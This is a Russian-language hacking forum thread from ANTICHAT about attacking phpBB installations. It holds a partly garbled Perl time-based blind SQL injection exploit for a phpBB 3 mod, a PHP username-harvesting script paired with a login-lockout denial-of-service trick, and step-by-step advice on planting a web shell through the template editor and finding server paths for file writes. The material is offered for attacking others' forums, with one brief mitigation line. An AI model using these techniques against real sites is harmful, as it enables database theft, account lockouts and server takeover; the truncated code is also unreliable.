HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.02.2011, 21:25
SlasH_
Guest
Сообщений: n/a
Провел на форуме:
313

Репутация: 0
По умолчанию

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

[CODE]
Code:
#!/usr/bin/perl # --------------------------------------------------------------- # phpBB 3 (Mod Tag Board get($host.injection($i,$chars[$j])); $time2 = time(); if($time2 - $time1 > 6) { syswrite(STDOUT,chr($chars[$j])); $hash .= chr($chars[$j]); last; } if($i == 1 && length $hash
 
Ответить с цитированием

  #2  
Старый 13.02.2011, 19:12
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350

Репутация: 0
По умолчанию

Уязвимость в phpbb 2.0.19

Уязвимость позволяет забанить всех пользователей на форуме, что в свою очередь может вызвать сбой в работе базы данных.

Суть ошибки состоит в том, что при авторизации пользователя можно вести неверные данные x-раз, что приведет к бану соответствующего пользователя форума на определенное время указное в админке форума и пользователь при авторизации увидит следующее - (Максимальное количество попыток (X) войти на форум было исчерпано. Вы не сможете войти на форум в последующие Y минут.) или произойдет ошибка в базе данных (phpBB : Critical Error Could not connect to the database).

Эксплоит (написан на php)

Собирает в файл Ники всех пользователей форума.


Код:
Code:
Профиль пользователя (.*)/i",$str,$return))
{if(trim($return[1])!=**)
{fputs($file,"$return[1]\n");
}}}}
fclose($file);
fclose($sock);
?>
Скрипт для сборки всех зарегенных юзеров универсальный т.е. подходит под любой форум. Но только если:

1. Если не зарегеным пользователям можно смотреть профайл других (иначе придеться еще посылать строку с вашими куками)

2. Правильно настроен preg_match("/nowrap=\"nowrap\">Профиль пользователя (.*)/i",$str,$return))

в некоторых форумах придеться немного изменить, если допустим имя юзверя находиться в титле Юзер - Lamer

то переписываем preg_match как

preg_match("/Юзер - (.*)/i",$str,$return))

Сам сплоит

Код:
Code:
Защита​


Убрать ограничение на число входов с неправильным паролем или увеличить его число через админку форума.
 
Ответить с цитированием

  #3  
Старый 11.12.2011, 11:44
stepashka_
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
Провел на форуме:
7879791

Репутация: 265


Отправить сообщение для stepashka_ с помощью ICQ
По умолчанию

Есть какие нибудь способы заливки шелла в 3.0.9 ?

Админ аккаунт имеется..
 
Ответить с цитированием

  #4  
Старый 13.12.2011, 01:06
cylaaaan
Участник форума
Регистрация: 31.08.2006
Сообщений: 149
Провел на форуме:
1763379

Репутация: 155
Отправить сообщение для cylaaaan с помощью ICQ
По умолчанию

А в 3.0.8 есть возможность залить? Админка есть
 
Ответить с цитированием

  #5  
Старый 14.12.2011, 06:54
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

stepashka_, cylaaan =>

1. /showpost.php?p=198446&postcount=3

2. 1) Вкладка общие --> Безопасность

Разрешить php в шаблонах: Да

2)Вкладка Стили --> Компоненты стилей ->> Шаблоны

С помощью встроенного редактора шаблонов выбираем файл и пишем в него:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]phpinfo[/COLOR][COLOR="#007700"](); [/COLOR][/COLOR
Далее применяем шаблон, идем на измененную страницу и видим наш php код
 
Ответить с цитированием

  #6  
Старый 15.01.2012, 18:30
Osstudio
Guest
Сообщений: n/a
Провел на форуме:
149611

Репутация: 81
По умолчанию

phpBB => `Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group`
Тип: полный путь.

Необходимо:админская учётная запись.


1.)Заходим в администраторскую панель.

2.)Переходим на вкладку PHPBB SEO.

3.)Находим на этой страничке "The cache folder configured is" и после этих слов и будет полный путь.


P.S Полезно, если file_priv=Y, а пути мы не знаем
 
Ответить с цитированием

  #7  
Старый 16.01.2012, 00:14
SecondLife
Guest
Сообщений: n/a
Провел на форуме:
5997

Репутация: 21
По умолчанию

Osstudio, данная вкладка не является стандартной для форума phpBB3, она является управляющей частью дополнения phpBB SEO от одноимённой команды www.phpbb-seo.com

Определить наличие данной модификации можно по значку внизу форума.
 
Ответить с цитированием

  #8  
Старый 16.01.2012, 19:15
Osstudio
Guest
Сообщений: n/a
Провел на форуме:
149611

Репутация: 81
По умолчанию

Цитата:
Сообщение от SecondLife  
SecondLife said:
Osstudio
, данная вкладка не является стандартной для форума phpBB3, она является управляющей частью дополнения
phpBB SEO
от одноимённой команды www.phpbb-seo.com
Определить наличие данной модификации можно по значку

внизу форума.
А, ясно
 
Ответить с цитированием

  #9  
Старый 21.01.2012, 03:11
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

шелл в стилях, для редактирования шаба доступны только два файла

overall_header.html и ph.html

куда они инклудятся?
 
Ответить с цитированием

  #10  
Старый 21.01.2012, 03:50
boortyhuhtyu
Guest
Сообщений: n/a
Провел на форуме:
225312

Репутация: -6
По умолчанию

Цитата:
Сообщение от faza02  
faza02 said:
шелл в стилях, для редактирования шаба доступны только два файла
overall_header.html
и
ph.html
куда они инклудятся?
путь чтоли, в /template.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Уязвимости CMS / форумов 167 17.10.2019 18:14
В ядре Linux появляется все больше уязвимостей dinar_007 Мировые новости. Обсуждения. 18 26.01.2007 16:21
Google Code Search облегчит хакерам задачу по поиску уязвимостей Lany Мировые новости. Обсуждения. 4 16.10.2006 21:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ